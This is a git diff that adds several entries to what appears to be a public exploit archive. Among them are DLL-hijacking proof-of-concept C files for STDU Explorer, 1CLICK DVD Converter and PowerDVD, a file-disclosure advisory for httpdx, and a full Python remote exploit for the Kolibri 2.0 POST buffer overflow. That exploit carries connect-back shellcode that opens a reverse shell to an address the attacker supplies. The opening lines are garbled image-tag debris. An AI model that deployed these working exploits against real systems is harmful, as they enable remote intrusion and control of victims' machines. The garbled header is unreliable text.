[img][img]//http://i.answers.microsoft.com/static/images/defaultuser7a.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7b.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.24[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7z.png?ver=4.6.0.28[/img][/img] +# +# 2) Buffer Overflow Vulnerability - # v4r14n7 c0d3 n.2 # By Christian Galeone +# +# CVE: CVE-2014-7222 +# +# [img][img]\\1\z[/img][/img][img][img]\\2\z[/img][/img][img][img]\\3\z[/img][/img][img][img]\\4\z[/img][/img][img][img]\\5\z[/img][/img][img][img]\\6\z[/img][/img][img][img]\\7\z[/img][/img][img][img]\\8\z[/img][/img][img][img]\\9\z[/img][/img][img][img]\\10\z[/img][/img][img][img]\\11\z[/img][/img][img][img]\\12\z[/img][/img][img][img]\\13\z[/img][/img][img][img]\\14\z[/img][/img][img][img]\\15\z[/img][/img][img][img]\\16\z[/img][/img][img][img]\\17\z[/img][/img][img][img]\\18\z[/img][/img][img][img]\\1\z[/img][/img][img][img]\\2\z[/img][/img][img][img]\\3\z[/img][/img][img][img]\\4\z[/img][/img][img][img]\\5\z[/img][/img][img][img]\\6\z[/img][/img][img][img]\\7\z[/img][/img][img][img]\\8\z[/img][/img][img][img]\\9\z[/img][/img][img][img]\\10\z[/img][/img][img][img]\\11\z[/img][/img][img][img]\\12\z[/img][/img][img][img]\\13\z[/img][/img] +# +# Fix: +# +# http://screech.me/ts3/plugins/antifreeze.html +# +# OR +# +# http://www.teamspeak.com/?page=downloads +# +# Original Source: +# +# http://r4p3.net/public/ts3bbcodefreeze.txt +# +# http://r4p3.net/forum/reverse-engineering/38/teamspeak-3-exploit-bb-code-freeze-crash-not-responding/905/ +# +# Credit(s): +# +# SpyEye (http://forum.teamspeak.com/member.php/263635-SpyEye) - 0r161n4l 3xpl017 d3v3l0p3r +# +# Christian Galeone - V4r14n7 3xpl017 d3v3l0p3r +# +# +################################################################################################## \ No newline at end of file diff --git a/platforms/windows/remote/34844.c b/platforms/windows/remote/34844.c new file mode 100755 index 000000000..ed8cb53d5 --- /dev/null +++ b/platforms/windows/remote/34844.c @@ -0,0 +1,86 @@ +source: http://www.securityfocus.com/bid/44128/info + +STDU Explorer is prone to a vulnerability that lets attackers execute arbitrary code. + +An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. + +STDU Explorer 1.0.201 is vulnerable; other versions may also be affected. + +=================================================== +STDU explorer DLL Hijacking Exploit (dwmapi.dll) +=================================================== + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 +0 _ __ __ __ 1 +1 /' \ __ /'__`\ /\ \__ /'__`\ 0 +0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 +1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 +0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 +1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 +0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 +1 \ \____/ >> Exploit database separated by exploit 0 +0 \/___/ type (local, remote, DoS, etc.) 1 +1 1 +0 [+] Site : Inj3ct0r.com 0 +1 [+] Support e-mail : submit[at]inj3ct0r.com 1 +0 0 +1 ######################################### 1 +0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1 +1 ######################################### 0 +0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 + + +/* +#stdu explorer DLL Hijacking Exploit (dwmapi.dll) + +#Author : anT!-Tr0J4n + +#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends + +#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com + +#Software: http://www.stdutility.com/stduexplorer.html + +#Tested on: Windows XP sp3 + +# Home : www.Dev-PoinT.com & http://inj3ct0r.com + +===================== +How TO use : Compile and rename to " dwmapi.dll " , create a file in the same dir with one of the following extensions. + +check the result > Hack3d + +===================== + + +#dwmapi.dll (code) +*/ + +#include +#define DLLIMPORT __declspec (dllexport) + +DLLIMPORT void DwmDefWindowProc() { evil(); } +DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); } +DLLIMPORT void DwmEnableComposition() { evil(); } +DLLIMPORT void DwmEnableMMCSS() { evil(); } +DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); } +DLLIMPORT void DwmGetColorizationColor() { evil(); } +DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); } +DLLIMPORT void DwmGetWindowAttribute() { evil(); } +DLLIMPORT void DwmIsCompositionEnabled() { evil(); } +DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); } +DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); } +DLLIMPORT void DwmRegisterThumbnail() { evil(); } +DLLIMPORT void DwmSetDxFrameDuration() { evil(); } +DLLIMPORT void DwmSetPresentParameters() { evil(); } +DLLIMPORT void DwmSetWindowAttribute() { evil(); } +DLLIMPORT void DwmUnregisterThumbnail() { evil(); } +DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); } + +int evil() +{ + WinExec("calc", 0); + exit(0); + return 0; +} + diff --git a/platforms/windows/remote/34846.txt b/platforms/windows/remote/34846.txt new file mode 100755 index 000000000..8c1a6f0ef --- /dev/null +++ b/platforms/windows/remote/34846.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/44141/info + +The 'httpdx' application is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to view the source code of files in the context of the server process. This may aid in further attacks. + +Versions prior to httpdx 1.4.6b are vulnerable. + +The following example URI are available: + +http://www.example.com/index.html. +http://www.example.com/test.py. +http://www.example.com/test.php. \ No newline at end of file diff --git a/platforms/windows/remote/34848.c b/platforms/windows/remote/34848.c new file mode 100755 index 000000000..3de65b16d --- /dev/null +++ b/platforms/windows/remote/34848.c @@ -0,0 +1,70 @@ +source: http://www.securityfocus.com/bid/44163/info + +1CLICK DVD Converter is prone to multiple vulnerabilities that let attackers execute arbitrary code. + +An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. + +LG Software Innovation 1CLICK DVD Converter 2.1.7.1 is vulnerable; other versions may also be affected. + +/* +#One CLICK DVD Converter 2.1.7.1 DLL Hijacking Exploit (vsoscaler.dll ; swscale.dll ; dvd43.dll ) + +#Author : anT!-Tr0J4n + +#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com + +#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends + +#special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member + +#Home : www.Dev-PoinT.com $ http://inj3ct0r.com + +#Software : www.lgsoftwareinnovations.com + +#Version : 2.1.7.1 + +#Tested on: Windows XP sp3 + + + + +========================== +How TO use : Compile and rename to (vsoscaler.dll ; swscale.dll ; dvd43.dll ) , create a file in the same dir with one of the following extensions. + + check the result -> 0wn3d + +========================== + ++ vsoscaler.dll + ++ swscale.dll + ++ dvd43.dll + + +*/ + +#include "stdafx.h" + +void init() { +MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "inj3ct0r",0x00000003); +} + + +BOOL APIENTRY DllMain( HANDLE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) +{ +case DLL_PROCESS_ATTACH: + init();break; +case DLL_THREAD_ATTACH: +case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: +break; + } + return TRUE; +} + diff --git a/platforms/windows/remote/34853.c b/platforms/windows/remote/34853.c new file mode 100755 index 000000000..31d682841 --- /dev/null +++ b/platforms/windows/remote/34853.c @@ -0,0 +1,41 @@ +source: http://www.securityfocus.com/bid/44193/info + +PowerDVD is prone to a vulnerability that lets attackers execute arbitrary code. + +An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. + +PowerDVD 5.00.1107 is vulnerable; other versions may also be affected. + +/* +[*] Author: Inj3cti0n P4ck3t +[*] e-mail: fer_henrick@hotmail.com +[*] Date: 18/10/2010 +[*] Name BUG: PowerDVD 5.00.1107 DLL Hijacking Exploit (trigger.dll) +[*] System tested: Windows XP (Version 5.1 Service Pack 3) +[*] PowerDVD.exe Version: 5.00.1107 +[*] Software to Download: N?o dispon?vel +[*] Application Path: C:\Arquivos de programas\CyberLink\PowerDVD\PowerDVD.exe +[*] DLL Found => trigger.dll + +Greetz: fvox +*/ + +#include +#include + +int testando() +{ + MessageBox(0, "Testando PoC", MB_OK); + FILE *fp; + fp = fopen("Inj3cti0nP4ck3t.txt", "w"); + fwrite("it works ;-)", 1, 12, fp); + fclose(fp); + exit(1); + return 0; +} + +BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) +{ + testandp(); + return TRUE; +} \ No newline at end of file diff --git a/platforms/windows/remote/34856.py b/platforms/windows/remote/34856.py new file mode 100755 index 000000000..bac14b122 --- /dev/null +++ b/platforms/windows/remote/34856.py @@ -0,0 +1,254 @@ +#!/bin/python +import socket, sys, re + +############################################################################################################ +# Exploit Title: Kolibri POST Buffer overflow with EMET 5.0 and EMET 4.1 Partial Bypass +# Date: September 30th 2014 +# Author: tekwizz123 +# Vendor Homepage: http://www.senkas.com +# Software Download: http://www.senkas.com/kolibri/download.php +# Version: 2.0 +# Tested on: Windows 7 32 bit, Windows 7 64 bit, Windows XP SP3 +# CVE-ID: CVE-2014-5289 +# +# This exploit will bypass all protections in EMET 5.0 and 4.1 but DEP. +# +# If you have any questions about the exploit, send a message to @tekwizz123 and I'll try help out. +# +# You may modify this exploit as you like for whatever purposes you like so long as my name (tekwizz123) +# appears as the original author of this exploit. +########################################################################################################### + +# Basic check to see if we have the arguments we need +if len(sys.argv) < 6: + print "Usage: " + sys.argv[0] + " *target ip* *target port* *ip to connect back to* *port to connect back to* *target*" + print "Targets: " + print "1. XP SP2 32 bit" + print "2. XP SP3 32 bit" + print "3. Windows Vista and Later 32 bit or 64 bit" + exit(1) + + + +# Set source ip and port and destination ip and port +targetip = sys.argv[1] +targetport = int(sys.argv[2]) +localhost = sys.argv[3] +localport = int(sys.argv[4]) + + +# Set the version of the remote machine so we can craft the correct exploit for it +target = int(sys.argv[5]) + + +# Check if the version was valid or not +if (target != 1 and target != 2 and target !=3): + print "Error: Target was not valid" + + + +# Define our check to see if the server is vulnerable +def check(): + handle = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + print "Checking if target is vulnerable....." + handle.connect((targetip, targetport)) + handle.send("GET / HTTP/1.1\r\n") + resp = handle.recv(1024) + handle.close() + + if re.search("server: kolibri\-2\.0", resp): + print "\nTarget is vulnerable\n" + else: + print "\nTarget is not vulnerable\n" + exit(0) # Exit the program before we continue + +# And call it to check if the server is vulnerable +check() + + + +# Define the code for the custom close socket loop +def addBufCloseSocketASM(buf): + #CloseSocket Call Loop. + """This is very important as without this code, if we terminate the program for some reason, + the program doesn't free up the sockets it uses to listen for the connections to the server. + Therefore, we check from 0 to about 205 ish (I think, can't remember the exact number) and close all + of these sockets one by one. Since you can only close a socket associated with the program from which + you call the CloseSocket call, this will not affect other applications, and thus is a nice solution.""" + buf += "\xBE\xA1\xF4\x6C\x01" + buf += "\x81\xEE\x01\x01\x01\x01" + buf += "\x8B\x36" + buf += "\x33\xFF" + buf += "\x33\xDB" + buf += "\x83\xC3\x50" * 7 + buf += "\x3B\xFB" + buf += "\x7F\x06" + buf += "\x57" + buf += "\xFF\xD6" + buf += "\x47" # Increment the flipping counter before we loop around again with next instruciton. + buf += "\xEB\xF6" + + return buf + +def addSocketASM(buf): + #Socket call to set up a new socket, on working one this is is WS2_32.WSASocketA? + buf += "\xBB\x91\xF4\x6C\x01" + buf += "\x81\xEB\x01\x01\x01\x01" + buf += "\x8B\x1B" + if target == 3: + buf += "\x81\xC3\x79\x8E\x01\x01" + buf += "\x81\xEB\x01\x01\x01\x01" + if target == 2: + buf += "\x81\xC3\xEB\x09\x11\x10" + buf += "\x81\xEB\xD6\xE8\x10\x10" + if target == 1: + buf += "\x81\xC3\x95\x77\x01\x01" + buf += "\x81\xEB\x79\x56\x01\x01" + buf += "\x33\xC9" + buf += "\x51\x51\x51\x51" + buf += "\x41\x51\x41\x51" + buf += "\xFF\xD3" + + return buf + +def addConnectCallASM(buf): + #Connect call + buf += "\xBB\xA5\xF4\x6C\x01\x81\xEB\x01\x01\x01\x01\x8B\x1B\x68" + + # Set the IP to connect back to within the shellcode, thanks to http://stackoverflow.com/questions/12638408/decorating-hex-function-to-pad-zeros + # this should now work with all IP addresses. + hostString = str(localhost).split(".") + buf += "{0:#0{1}x}".format(int(hostString[0]),4)[2:4].decode('hex') + buf += "{0:#0{1}x}".format(int(hostString[1]),4)[2:4].decode('hex') + buf += "{0:#0{1}x}".format(int(hostString[2]),4)[2:4].decode('hex') + buf += "{0:#0{1}x}".format(int(hostString[3]),4)[2:4].decode('hex') + + # Some static bytes in the shellcode + buf += "\xB9\x02\x01" + + # The the port to connect back on in the shellcode + hexPort = hex(localport) + buf += hexPort[2:4].decode('hex') + buf += hexPort[4:].decode('hex') + + # Finish the last of the Connect call shellcode + buf += "\xFE\xCD\x51\x8B\xCC\x8B\xF0\x33\xC0\xB0\x16\x50\x51\x56\xFF\xD3" + + return buf + +def addExitProcessASM(buf): + #ExitProcess Call + buf += "\xBF\x15\xEE\x6C\x01\x81\xEF\x01\x01\x01\x01\x8B\x3F\xFF\xD7" + return buf + + + +########################################################################################################################## + +# This section is responsible for doing a standard stack overflow against XP targets to get around SEHOP issues not present +# with the Windows 7 version for some reason. + +########################################################################################################################## +if (target == 1 or target == 2): + buf = "" + + # Add the close socket assembly to the buffer variable + buf = addBufCloseSocketASM(buf) + + # Add the socket assembly to open up a new socket + buf = addSocketASM(buf) + + # Add the assembly to connect back to our host + buf = addConnectCallASM(buf) + + + #CreateProcessA call + buf += "\x33\xC9\xB1\x54\x2B\xE1\x8B\xFC\x57\x33\xC0\xF3\xAA\x5F\xC6\x07\x44\xFE\x47\x2D\x57\x8B\xC6\x8D\x7F\x38\xAB\xAB\xAB\x5F\x33\xC0\x8D\x77\x44\xB9\x64\x6E\x65\x01\x81\xE9\x01\x01\x01\x01\x51\x8B\xCC\x56\x57\x50\x50\xBA\x10\x10\x10\x18\x81\xEA\x10\x10\x10\x10\x52\x40\x50\x48\x50\x50\x51\x50\xBE\xFD\xED\x6C\x01\x81\xEE\x01\x01\x01\x01\x8B\x36\xFF\xD6" + + # Add ExitProcess shellcode + buf = addExitProcessASM(buf) + + overflow = "A" * 515 + if target == 2: + overflow += "\x7B\x46\x86\x7C" #7C86467B on Windows XP SP3 = JMP ESP + if target == 1: + overflow += "\xED\x1E\x94\x7C" #7C941EED on Windows XP SP2 = JMP ESP + overflow += buf + + + + + +######################################################################################################## + +# This section of the exploit deals with the Windows 7 version of the exploit + +######################################################################################################## +if (target == 3): + + # Start defining our shellcode into the buf variable, starting with the tag for our egghunter: + buf = "\x43\x44\x44\x45\x43\x44\x44\x45" + + # Add the close socket assembly to the buffer variable + buf = addBufCloseSocketASM(buf) + + #Socket call to set up a new socket, on working one this is is WS2_32.WSASocketA? + buf = addSocketASM(buf) + + # Add the assembly to connect back to our host + buf = addConnectCallASM(buf) + + #CreateProcessA call + buf += "\x33\xC9\xB1\x54\x2B\xE1\x8B\xFC\x57\x33\xC0\xF3\xAA\x5F\xC6\x07\x44\xFE\x47\x2D\x57\x8B\xC6\x8D\x7F\x38\xAB\xAB\xAB\x5F\x33\xC0\x8D\x77\x44\xB9\x64\x6E\x65\x01\x81\xE9\x01\x01\x01\x01\x51\x8B\xCC\x56\x57\x50\x50\xBA\x10\x10\x10\x18\x81\xEA\x10\x10\x10\x10\x52\x40\x50\x48\x50\x50\x51\x50\xBF\xFD\xED\x6C\x01\x81\xEF\x01\x01\x01\x01\x8B\x3F\xFF\xD7" + + + # Add ExitProcess shellcode + buf = addExitProcessASM(buf) + + + # The legendary WoW64 egghunter created by Lincoln. Greetz mate, you've done a brilliant job with this :) + # One should also note, if the target has EAF enabled, this egghunter will take longer to run + egghunter = ( + "\x33\xD2" # XOR EDX, EDX to start the search from the beginning of memory, a la 00000000. + "\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0" + "\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd" + "\x2e\x5a\x3c\x05\x74\xea\xb8" + "\x43\x44\x44\x45" # tag to search for + "\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89" + "\xe2\x64\xff\x13\x5e\x5a\xeb\xdf\x90\x90") + + overflow = "A" * 12 + overflow += "A" * (790 - len(overflow) - len(egghunter)) + overflow += egghunter + overflow += "A" * 2 + overflow += "\xEB\x99" # NSEH overwrite + overflow += "\xD1\x87\x44" #SEH overwrite 004487D1 aka xor pop pop ret from the binary itself. + + + +# Define our buffer for the exploit + +buffer = "POST /" + overflow + " HTTP/1.1\r\n" +buffer += "User-Agent: Wget/1.13.4\r\n" +buffer += "Host: " + buf + "\r\n"# change this! +buffer += "Accept: */*\r\n" +buffer += "Connection: Keep-Alive\r\n" +buffer += "Content-Type: application/x-www-form-urlencoded\r\n" +buffer += "Content-Length: 4" +buffer += "\r\n\r\n" +buffer += "licenseID=string&content=string¶msXML=string" + + +# Set up the handle and connect to the target, the send the buffer and close the connection +handle = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +print "Connecting to the target......" +handle.connect((targetip, targetport)) +print "Sending evil buffer....." +handle.send(buffer) +handle.close() + +# Print out details about the expected waiting time for the egghunter to work. +print "\nWe are now done." +print "If targeting XP, your shell will be instant" +print "If targeting Windows Vista and later, you will recieve your shell within 6 seconds if the target has not enabled EAF protection" +print "Otherwise, if the target has enabled EAF protection, expect your shell within 35 seconds."